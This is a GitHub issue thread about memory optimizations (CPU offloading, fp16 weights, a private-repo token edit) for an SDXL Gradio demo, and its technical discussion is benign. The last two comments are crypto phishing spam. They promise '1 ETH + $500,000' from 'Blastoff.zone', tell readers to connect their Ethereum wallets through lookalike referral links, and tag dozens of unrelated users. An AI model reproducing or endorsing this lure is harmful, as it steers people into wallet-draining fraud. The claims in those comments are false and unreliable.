### ISSUE TITLE
pipe.enable_model_cpu_offload() is also using GPU but it's great for vram saving.

### ISSUE THREAD

**Issue by cmhamiche** [newtonapple/sdxl-demos#1]
```
if device == "cpu":
        pipe.enable_model_cpu_offload()
    else:
        pipe.to(device)
```

From https://huggingface.co/docs/diffusers/optimization/fp16
```
Model offloading for fast inference and memory savings
Sequential CPU offloading, as discussed in the previous section, preserves a lot of memory but makes inference slower, because submodules are moved to GPU as needed, and immediately returned to CPU when a new module runs.

Full-model offloading is an alternative that moves whole models to the GPU, instead of handling each model’s constituent modules. This results in a negligible impact on inference time (compared with moving the pipeline to cuda), while still providing some memory savings.

In this scenario, only one of the main components of the pipeline (typically: text encoder, unet and vae) will be in the GPU while the others wait in the CPU. Components like the UNet that run for multiple iterations will stay on GPU until they are no longer needed.
```
~~Also there is no path for the image to be saved at so it's located at /temp/gradio. after inference on linux.~~

Thanks for the script btw, it's pretty straightforward.

edit: I get it to work on a 12gb card with pipe.enable_model_cpu_offload(), it will OOM otherwise.

edit 2: About the path: my bad, if I flag the picture it's saved in ./flagged/output and add an entry to the logs, I got it now.

**Comment by newtonapple** [comment]
@cmhamiche Thanks for the optimization reference! I've added some those [optimizations](https://github.com/newtonapple/sdxl-demos/commit/9ac109470d0e75da49eb35c8a124f72db6b2ff08) from the referenced doc.  Let me know if it works better for you.  

Please note that, I've forced push over the `main` branch (last time I'll do this).  If you do want the update, make sure you do a `git pull --rebase`. 

Thanks again for ticket. :)

**Comment by cmhamiche** [comment]
You're welcome.
Thanks for the optimizations. 
FIY, I've also tried xformers and attention slicing yesterday but haven't seen any noticeable improvements on vram or inference speed over "reduce-overhead" torch's mode (using an nvidia RTX 3060 12gb). 

For faster loading, I'm using a pruned version and all the weights including vae and unet are fp16 so I lazily added 
`access_token = "hf_myHFtoken"` on top of txt2img_webui.py and sdxl.py to access my private HF repo. 

I also edited this to get lan access to the gradio:
`WebUI(low_vram=args.lowvram).launch(server_name="0.0.0.0", server_port=args.port)`

I'm perfectly fine with the script as is, you don't have to bother.

edit: I forgot, there's also this edit in sdxl.py (HF token for a private repo):
```
    pipe = DiffusionPipeline.from_pretrained(
        model,
        torch_dtype=torch_dtype,
        use_safetensors=True,
        use_auth_token=access_token,
        variant=variant,
    )
```
It's not needed with a public repo, it's for my personal use case.

edit 2:
~~I got an error right after the base model finished the inference~~
nvm. I added the base model twice, instead of the refiner. It's working great. Thanks again.

**Comment by newtonapple** [comment]
FYI, I think for Torch 2.0 above, you don't need to use xformers.

**Comment by jorge-nascimento** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
cjluo, @colhountech, @zyrikby, @paullangdale, @CONSTNCGCG, @joshiemoore, @Quinoto, @ASO92, @lowchuenleik, @bovem, @abdallahheidar, @musiclicn, @dikien, @spacecurrychips, @zhiting-wang, @jandykwan, @lepetitcrack, @mani2106, @arborescere, @techtabu, @sondalex, @thomasklemm, @themantalope, @tomasbolivar, @crsando, @irivers29, @stauntonjr, @clust3r1, @yongchaozhang, @brizzbane, @SathishN, @AntonioVentimiglia, @ahoangx, @TheOGig, @algoeng, @peterkuczera, @kurtbradd, @cybergeekgyan, @HanMufu, @simonebaracchi, @masud-abdulkadir, @alldbi, @EricBlumenstock, @joviarnandy, @AVPittman, @vumilan, @kunalc10, @Luukgr, @steve-lyons, @connormcl

**Comment by phieule2024** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
santa112358, @Microllin, @dotdivee, @khoodose, @shembel, @chuanhaisoft, @homoluctus, @Aim932, @pwnren, @rurico, @develon2015, @thatMrSheep, @AsharibAli, @oraqlle, @sergeichestakov, @SheenyMeg, @nicobevilacqua, @ScarboroughCoral, @D-lyw, @ninjakira, @ikachko, @FelipeODonnell, @billyjojojobulido, @luissla, @gxy5202, @Talljack, @dmmaycon, @denisonamaral, @sigharam, @consatan, @marsprince, @ktn1234, @dequan1331, @henryclw, @ExpandedMancho, @projectdp, @dinuka-rp, @MohsenKh94, @aqeox, @recoskyler, @binoculars, @mporracindie, @baddddddddd, @seachai, @itsina96, @KaanKC, @sanderhelleso, @Robin5605, @dalvinderjitsingh, @justjinn
